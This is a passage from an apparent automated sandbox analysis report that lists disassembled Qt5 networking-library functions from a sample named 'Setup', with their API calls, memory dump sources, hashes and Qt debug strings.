                                                                                                                                                                • Part of subcall function 00007FFBA19B4E30: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4FAC
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D50
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D5E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D71
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6DA7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6DBB
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6DCC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6E06
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6E10
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6E1A
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@Hash$Array@@ByteV0@@$?detach_helper@?free_helper@Node@1@Node@1@@$BasicTimer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3171273871-0
                                                                                                                                                              • Opcode ID: df477cb790d8c12ad5df72f093be0e024e7f27c432e4ceff40af62d262b93393
                                                                                                                                                              • Instruction ID: c139c8c951637ec1572d01ba46b88229ddc73bf229e39ef3870eab19f16cb198
                                                                                                                                                              • Opcode Fuzzy Hash: df477cb790d8c12ad5df72f093be0e024e7f27c432e4ceff40af62d262b93393
                                                                                                                                                              • Instruction Fuzzy Hash: 6341C2B2A0AA4296EB82CF35D84417833A1FB44B68F444136DF1E47694EF3CE55ACF00
                                                                                                                                                              Function 00007FFBA197CC90 Relevance: 19.6, APIs: 13, Instructions: 98COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$memmove$?append@?detach_grow@?dispose@?end@?lock@Data@1@Data@1@@Locker@@MutexMutex@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3273657621-0
                                                                                                                                                              • Opcode ID: 1286bc6bfe0c6da8d4422549c6b866b9e9a34cace0f9d59130ace275fcfcc975
                                                                                                                                                              • Instruction ID: 4d6617fa6544e0fe62122ab98a46439da90bb17cf78e0dee155a12220fda1537
                                                                                                                                                              • Opcode Fuzzy Hash: 1286bc6bfe0c6da8d4422549c6b866b9e9a34cace0f9d59130ace275fcfcc975
                                                                                                                                                              • Instruction Fuzzy Hash: FC417C76A0AA4282EB929F21E8541B87365FF84BE4F854132DD5E477A4EF7CE449CB00
                                                                                                                                                              Function 00007FFBA19727F0 Relevance: 19.6, APIs: 13, Instructions: 98COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA1972812
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197284F
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197285E
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197286D
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728AB
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728D9
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728EF
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728FE
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197290D
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA1972927
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA1972932
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197293D
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197294B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteV0@@$?data@ArrayData@@String@@$memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4187826100-0
                                                                                                                                                              • Opcode ID: 022488380ec874e201addea0da0b257d8b313069e6283001033adb08d12289e2
                                                                                                                                                              • Instruction ID: cbdc431372851f348b2f51497552858728a7098ab2c5eafba552fc4d8a248fad
                                                                                                                                                              • Opcode Fuzzy Hash: 022488380ec874e201addea0da0b257d8b313069e6283001033adb08d12289e2
                                                                                                                                                              • Instruction Fuzzy Hash: E6417CB2719A4682DF51DF25E5944BDB3A1FB84B98B448022DE9E07768EF3CD54ACB00
                                                                                                                                                              Function 00007FFBA197C050 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 261timewindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessCache::releaseEntry: trying to release key '%s' that is not in cache, xrefs: 00007FFBA197C0D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$Array@@ByteData@@HashHash@@Logger@@Message$?add?current?data@?detach_helper@?free_helper@?warning@Char@@Node@1@Node@1@@Secs@String@@TimeUtc@V0@$$V0@@V1@_
                                                                                                                                                              • String ID: QNetworkAccessCache::releaseEntry: trying to release key '%s' that is not in cache
                                                                                                                                                              • API String ID: 3083673391-687977604
                                                                                                                                                              • Opcode ID: 3064fc972378619a1b881fcc307f6dabe4d00f0c57cc274534df81d690ab70b8
                                                                                                                                                              • Instruction ID: 4f3e6e5d43b9cb048561963ceb6dac6ebb2e532cdb05c9e0ef9e548e54ef1b95
                                                                                                                                                              • Opcode Fuzzy Hash: 3064fc972378619a1b881fcc307f6dabe4d00f0c57cc274534df81d690ab70b8
                                                                                                                                                              • Instruction Fuzzy Hash: D7B178B2B0AB4686EBA2DF25E44427973A4FF84B98F854431CE5D47754EF38E842CB50
                                                                                                                                                              Function 00007FFBA198B520 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImpl: network cache returned a device that is not open -- class %s probably needs to be fixed, xrefs: 00007FFBA198B6DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Device@@Logger@@MessageOpen@$?class?critical@?free_helper@Data@@HashInt@MetaName@Node@1@@Object@@V0@@Valid@
                                                                                                                                                              • String ID: QNetworkReplyImpl: network cache returned a device that is not open -- class %s probably needs to be fixed
                                                                                                                                                              • API String ID: 537839420-1703945251
                                                                                                                                                              • Opcode ID: 470897026170c8b8f2abf86fe467e55f5b5c12b58f52eef17cf3987f94b3d20b
                                                                                                                                                              • Instruction ID: 324e535c9f31e54e7755986421e21a19744b526242a32ee21cdeacdce0d80210
                                                                                                                                                              • Opcode Fuzzy Hash: 470897026170c8b8f2abf86fe467e55f5b5c12b58f52eef17cf3987f94b3d20b
                                                                                                                                                              • Instruction Fuzzy Hash: 0A514CA2A0AA5295EF85DF75D4546EC2360FF44BACF944032EE1E476A5EF38D44ACB00
                                                                                                                                                              Function 00007FFBA197E320 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImpl: backend error: caching was enabled after some bytes had been written, xrefs: 00007FFBA198C3A8
                                                                                                                                                              • QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false) -- backend %s probably needs to be fixed, xrefs: 00007FFBA198C32A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Logger@@Message$?class?critical@?debug@Bool@MetaName@Object@@V0@@
                                                                                                                                                              • String ID: QNetworkReplyImpl: backend error: caching was enabled after some bytes had been written$QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false) -- backend %s probably needs to be fixed
                                                                                                                                                              • API String ID: 3810139445-743246420
                                                                                                                                                              • Opcode ID: 78e568f9dc70c4b86bb5629bbc274a5ad8864013b5f4cdebbdd9e79dc4f0c29d
                                                                                                                                                              • Instruction ID: 74ba93a33f3767d7b635cf9bf29c99cd554ffd857b23fa2ed675f1f6b8346c42
                                                                                                                                                              • Opcode Fuzzy Hash: 78e568f9dc70c4b86bb5629bbc274a5ad8864013b5f4cdebbdd9e79dc4f0c29d
                                                                                                                                                              • Instruction Fuzzy Hash: 20414272A0E64282EB928B39E4542B96361FF95BD8F544032DE9E07665DF3CE546CF00
                                                                                                                                                              Function 00007FFBA19FF470 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QObjectPrivate@@QEAA@H@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF49D
                                                                                                                                                              • CoInitialize.OLE32(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF4BC
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF4D4
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF4F9
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF507
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF517
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFB4B
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: ?fromWCharArray@QString@@SA?AV1@PEB_WH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC07
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC2C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF532
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF53D
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF548
                                                                                                                                                              • ??0QObject@@IEAA@AEAVQObjectPrivate@@PEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF59F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Message$Category@@Logger@@LoggingObjectPrivate@@String@@$?from?warning@Array@CharEnabled@FormatFreeH00@Init_thread_footerInitializeLocalObject@@String@@@V0@@Warningmalloc
                                                                                                                                                              • String ID: Failed to initialize COM:
                                                                                                                                                              • API String ID: 2351763995-2399992133
                                                                                                                                                              • Opcode ID: 25ebf824219e0f63c29a817e97e85afd5770fbd8804ec85f43151cd68469fc99
                                                                                                                                                              • Instruction ID: 8224ecf109b6e34fee762d7c6369080971cd00b4f8a5ddd5a7f7d2a082c09feb
                                                                                                                                                              • Opcode Fuzzy Hash: 25ebf824219e0f63c29a817e97e85afd5770fbd8804ec85f43151cd68469fc99
                                                                                                                                                              • Instruction Fuzzy Hash: 063183A2A0AB4292EB85DB76E41417973A1FF88BD4F004036DE5E47761EF3CD459CB00
                                                                                                                                                              Function 00007FFBA19D32C0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 70COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Lower@$??8@?host@?machineComponentFlags@FormattingHostInfo@@Latin1Name@Option@String@@0@String@@@Url@@Url@@@@@
                                                                                                                                                              • String ID: localhost
                                                                                                                                                              • API String ID: 1423102908-2663516195
                                                                                                                                                              • Opcode ID: 64ad9057d1978c070556d6b1cdca8d8063233c76ef94d4645756658d89ca9ee9
                                                                                                                                                              • Instruction ID: 8a56146c505839835a01551882de44835e4bde426a14cd2adde6fb588644f241
                                                                                                                                                              • Opcode Fuzzy Hash: 64ad9057d1978c070556d6b1cdca8d8063233c76ef94d4645756658d89ca9ee9
                                                                                                                                                              • Instruction Fuzzy Hash: 153188E161D74292EB82DB24E4442B9B361FF80795F441031ED8E466A5EF6CE649CF00
                                                                                                                                                              Function 00007FFBA19DF390 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QEventLoop@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FFBA19DF3DA
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DF409
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DF414
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DF43B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DF446
                                                                                                                                                              • ?singleShot@QTimer@@SAXHPEBVQObject@@PEBD@Z.QT5CORE ref: 00007FFBA19DF45A
                                                                                                                                                              • ?exec@QEventLoop@@QEAAHV?$QFlags@W4ProcessEventsFlag@QEventLoop@@@@@Z.QT5CORE ref: 00007FFBA19DF46A
                                                                                                                                                              • ??1QEventLoop@@UEAA@XZ.QT5CORE ref: 00007FFBA19DF47D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Connection@EventMeta$Loop@@$?connect@ConnectionQt@@@Type@$?exec@?singleEventsFlag@Flags@Loop@@@@@Object@@@ProcessShot@Timer@@
                                                                                                                                                              • String ID: 1quit()$2error(QNetworkSession::SessionError)$2quitPendingWaitsForOpened()
                                                                                                                                                              • API String ID: 3160854680-1977835684
                                                                                                                                                              • Opcode ID: 0f515768b20db7d698d8c104e7d155a5faa5a2e34da404367f375e6537d2eb37
                                                                                                                                                              • Instruction ID: 04d8b77e09c3bdd93f4f8814dc36bf45dcdf12482e21648c10ea59bc1db9f0ce
                                                                                                                                                              • Opcode Fuzzy Hash: 0f515768b20db7d698d8c104e7d155a5faa5a2e34da404367f375e6537d2eb37
                                                                                                                                                              • Instruction Fuzzy Hash: 65313EB261DA4582DB81CF26F4441AEB761FB84BA4F484032EE9D47668EF3CD545CF00
                                                                                                                                                              Function 00007FFBA19C49B0 Relevance: 18.1, APIs: 12, Instructions: 115timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19C898A,?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49BE
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49C8
                                                                                                                                                              • ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49E1
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A38
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A42
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A50
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A5E
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A87
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A95
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B11
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B1A
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B35
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
